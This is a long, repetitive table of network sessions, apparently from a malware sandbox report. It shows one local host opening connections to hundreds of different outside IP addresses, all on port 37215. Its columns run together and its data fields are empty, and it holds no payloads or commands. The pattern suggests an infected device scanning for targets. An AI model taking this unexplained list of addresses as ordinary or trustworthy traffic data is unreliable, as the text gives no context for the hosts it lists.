                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4965192.168.2.1335688216.169.233.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4966192.168.2.1342826197.91.151.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4967192.168.2.1341050197.135.178.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4968192.168.2.133589241.7.144.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4969192.168.2.1345016157.70.112.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4970192.168.2.1346330197.61.101.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4971192.168.2.1357686197.91.92.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4972192.168.2.1348402197.219.139.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4973192.168.2.1343632197.244.97.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4974192.168.2.1351402197.141.108.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4975192.168.2.1334534197.182.172.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4976192.168.2.1346374173.130.125.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4977192.168.2.1359240197.192.14.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4978192.168.2.1358846157.228.236.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4979192.168.2.1342792157.5.150.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4980192.168.2.134840441.139.143.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4981192.168.2.135202641.252.153.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4982192.168.2.133869441.135.111.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4983192.168.2.1341978157.187.27.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4984192.168.2.133420217.125.140.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4985192.168.2.1356672197.170.132.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4986192.168.2.1353704157.127.78.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4987192.168.2.1344252197.127.240.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4988192.168.2.135953272.182.14.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4989192.168.2.1339064157.244.132.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4990192.168.2.135329241.204.134.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4991192.168.2.1347110197.102.118.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4992192.168.2.1347718166.189.213.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4993192.168.2.1333740197.167.114.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4994192.168.2.1340846197.104.102.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4995192.168.2.1354814197.220.114.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4996192.168.2.1346408197.127.0.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4997192.168.2.1343762157.118.229.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4998192.168.2.1357046197.36.101.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4999192.168.2.1339604212.91.171.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5000192.168.2.1357094197.171.152.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5001192.168.2.1349978157.80.80.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5002192.168.2.134297252.147.22.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5003192.168.2.135451641.91.78.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5004192.168.2.1334234197.155.77.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5005192.168.2.1339326157.17.198.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5006192.168.2.1344724157.32.80.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5007192.168.2.1345716157.19.136.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5008192.168.2.1349996197.142.94.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5009192.168.2.134167441.126.189.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5010192.168.2.1354784157.4.99.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5011192.168.2.1348908174.191.97.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5012192.168.2.1351960157.121.159.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5013192.168.2.1346634197.44.40.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5014192.168.2.135393841.125.133.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5015192.168.2.1334754197.39.176.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5016192.168.2.134011241.156.242.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5017192.168.2.1336852157.74.229.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5018192.168.2.133441841.45.113.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5019192.168.2.1338276197.226.68.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5020192.168.2.1341450197.236.209.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5021192.168.2.1333178197.25.203.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5022192.168.2.133837241.209.3.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5023192.168.2.1332986157.181.145.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5024192.168.2.133681841.127.139.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5025192.168.2.135054441.59.183.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5026192.168.2.133836841.21.89.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5027192.168.2.135692041.137.156.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5028192.168.2.1352620197.54.208.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5029192.168.2.135025241.192.141.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5030192.168.2.1333620157.21.182.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5031192.168.2.1360358157.48.93.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5032192.168.2.135276041.9.111.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5033192.168.2.134992641.208.5.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5034192.168.2.1356642159.242.72.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5035192.168.2.133456441.52.54.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5036192.168.2.1332892197.23.141.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5037192.168.2.1358046197.181.189.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5038192.168.2.1346838157.194.173.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5039192.168.2.135035841.128.100.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5040192.168.2.133436641.233.110.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5041192.168.2.1351944125.31.239.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5042192.168.2.1352086197.136.169.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5043192.168.2.134898641.137.246.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5044192.168.2.1347764197.86.105.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5045192.168.2.134830231.142.129.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5046192.168.2.1350100157.171.206.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5047192.168.2.1337716197.143.160.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5048192.168.2.1342942197.17.193.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5049192.168.2.1348706157.35.40.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5050192.168.2.1356080197.147.64.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5051192.168.2.1360478157.6.61.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5052192.168.2.1357560197.171.152.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5053192.168.2.134627041.229.12.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5054192.168.2.1359158193.37.237.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5055192.168.2.134490488.71.181.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5056192.168.2.1354046197.38.138.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5057192.168.2.1356352157.116.74.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5058192.168.2.1335278157.173.231.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5059192.168.2.135375892.239.225.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5060192.168.2.1358264197.225.167.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5061192.168.2.1360290157.119.87.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5062192.168.2.1344852197.192.159.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5063192.168.2.1338122197.0.209.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5064192.168.2.1344762157.140.172.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5065192.168.2.1349324157.164.57.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5066192.168.2.1355458164.43.132.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5067192.168.2.134912268.239.124.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5068192.168.2.1351894197.143.185.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5069192.168.2.1346494197.175.7.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5070192.168.2.1336456126.7.183.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5071192.168.2.134948041.19.21.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5072192.168.2.1354110157.194.208.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5073192.168.2.135941476.160.234.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5074192.168.2.134662053.43.137.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5075192.168.2.135524441.190.223.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5076192.168.2.1353458157.30.42.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5077192.168.2.1341964197.198.45.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5078192.168.2.1337606162.215.45.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5079192.168.2.134822241.212.23.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5080192.168.2.1345468197.116.40.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5081192.168.2.1345636157.115.136.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5082192.168.2.134801441.3.236.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5083192.168.2.1353620197.26.211.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5084192.168.2.1353420157.35.39.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5085192.168.2.1347180164.2.196.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5086192.168.2.1336374197.245.70.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5087192.168.2.1351066197.125.121.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5088192.168.2.1333468197.235.184.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5089192.168.2.1340396197.148.82.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5090192.168.2.135379241.116.230.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5091192.168.2.1339352197.88.112.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5092192.168.2.1348932157.134.197.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5093192.168.2.1340356157.48.38.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5094192.168.2.1354162157.250.27.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5095192.168.2.1356332197.229.169.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5096192.168.2.135141441.218.240.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5097192.168.2.133441041.211.248.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5098192.168.2.1360098197.173.234.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5099192.168.2.133293041.119.209.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5100192.168.2.135234641.134.250.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5101192.168.2.135252241.44.76.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5102192.168.2.1339152197.57.116.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5103192.168.2.135888841.47.145.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5104192.168.2.135139041.6.182.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5105192.168.2.134016038.185.78.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5106192.168.2.1360904191.183.154.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5107192.168.2.1355146197.206.11.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5108192.168.2.1347888197.49.173.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5109192.168.2.135842841.87.240.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5110192.168.2.1335950157.45.15.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5111192.168.2.135720495.16.239.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5112192.168.2.135228441.175.162.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5113192.168.2.1356520197.144.14.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5114192.168.2.1353846157.21.54.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5115192.168.2.1339722197.203.19.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5116192.168.2.1339868197.194.130.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5117192.168.2.133524641.4.115.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5118192.168.2.1343588157.211.174.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5119192.168.2.134595041.149.231.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5120192.168.2.136059441.188.5.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5121192.168.2.134856427.204.118.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5122192.168.2.1342154197.162.55.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5123192.168.2.135465841.43.45.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5124192.168.2.135346641.182.119.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5125192.168.2.134851441.159.81.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5126192.168.2.1355252157.211.205.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5127192.168.2.134334641.186.128.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5128192.168.2.133665443.44.231.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5129192.168.2.1335154150.75.118.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5130192.168.2.134860441.159.52.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5131192.168.2.1337926157.188.201.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5132192.168.2.1342256157.78.86.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5133192.168.2.1350550157.158.44.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5134192.168.2.1333334197.162.141.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5135192.168.2.1345804197.204.236.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5136192.168.2.1350846197.246.179.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5137192.168.2.1346362197.70.223.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5138192.168.2.1341982119.120.48.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5139192.168.2.134137841.137.215.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5140192.168.2.134644241.210.66.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5141192.168.2.134338241.88.49.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5142192.168.2.134077442.212.36.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5143192.168.2.1339682157.17.60.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5144192.168.2.1352478197.180.6.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5145192.168.2.134544041.25.90.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5146192.168.2.1352246157.8.66.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5147192.168.2.134754241.115.232.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5148192.168.2.1354896197.158.199.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5149192.168.2.1347298157.47.205.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5150192.168.2.1356354179.161.211.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5151192.168.2.1349802197.242.2.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5152192.168.2.135174041.250.55.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5153192.168.2.1345242157.202.178.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5154192.168.2.134789648.106.208.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5155192.168.2.1347208197.236.71.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5156192.168.2.134424441.211.237.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5157192.168.2.1334768197.9.32.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5158192.168.2.134601841.237.124.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5159192.168.2.135636841.25.230.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5160192.168.2.1344252197.200.92.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5161192.168.2.134724870.216.95.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5162192.168.2.135075483.71.55.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5163192.168.2.1336162197.17.26.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5164192.168.2.1347096197.210.20.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5165192.168.2.13607209.141.166.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5166192.168.2.1341370192.14.31.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5167192.168.2.1345734157.77.30.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5168192.168.2.1338082108.118.93.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5169192.168.2.1344166197.87.232.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5170192.168.2.1333882157.192.129.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5171192.168.2.1337470206.255.16.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5172192.168.2.135628485.78.28.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5173192.168.2.1348828121.178.173.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
